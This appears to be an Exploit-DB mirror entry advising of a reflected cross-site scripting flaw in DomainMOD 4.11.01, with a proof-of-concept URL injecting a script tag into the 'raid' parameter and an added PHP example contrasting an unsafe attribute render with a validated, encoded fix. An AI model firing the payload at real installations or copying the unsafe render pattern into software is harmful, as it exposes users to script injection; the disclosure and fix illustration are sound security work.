exploit-db-mirror/exploits/php/webapps/45883.txt
Offensive Security 5643770257 DB: 2018-11-17
6 changes to exploits/shellcodes

Mumsoft Easy Software 2.0 - Denial of Service (PoC)
Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)

Linux - Broken uid/gid Mapping for Nested User Namespaces

Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection
Helpdezk 1.1.1 - Arbitrary File Upload
DomainMOD 4.11.01 - Cross-Site Scripting
2018-11-17 05:01:40 +00:00

# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-09
# Exploit Author: Dawood Ansar
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19136
# A reflected cross-site scripting (XSS) vulnerability was discovered in the DomainMOD application,
# versions v4.09.03 to v4.11.01: https://github.com/domainmod/domainmod/issues/79
# After logging into the DomainMOD application panel, browse to the assets/edit/registrar-account.php
# page and inject a JavaScript XSS payload in the raid parameter
# POC:
http://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&del=1
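
# Added example (not part of the original advisory and not DomainMOD's own code): the reflection
# pattern implied by the PoC, where a quote closes an HTML attribute, beside a hardened form.
# Assumptions: raid is a positive integer record id; all function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Added illustration; not DomainMOD source. Function names are hypothetical.
// Assumption: raid identifies a registrar account by a positive integer id.

/** Pre-fix pattern: the raw query value lands inside a quoted attribute. */
function render_unsafe(string $raid): string
{
    return '<input type="hidden" name="raid" value="' . $raid . '">';
}

/** Accept only a positive decimal integer; anything else yields null. */
function parse_raid(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Encode for an HTML attribute context, quotes included. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hardened pattern: validate the type first, then encode on output anyway. */
function render_safe(?string $raw): string
{
    $id = parse_raid($raw);
    if ($id === null) {
        return '<p>Invalid registrar account id.</p>';
    }
    return '<input type="hidden" name="raid" value="' . h((string) $id) . '">';
}

// Constructed inputs: a normal id and the decoded raid value from the PoC URL above.
$samples = ['42', 'hello"><script>alert("XSS")</script>'];
foreach ($samples as $raw) {
    echo 'input : ', $raw, PHP_EOL;
    echo 'unsafe: ', render_unsafe($raw), PHP_EOL;
    echo 'safe  : ', render_safe($raw), PHP_EOL, PHP_EOL;
}
```

# Validation rejects the non-numeric value before it reaches the page; the encoding step covers
# any other field that must echo free-form text into an attribute.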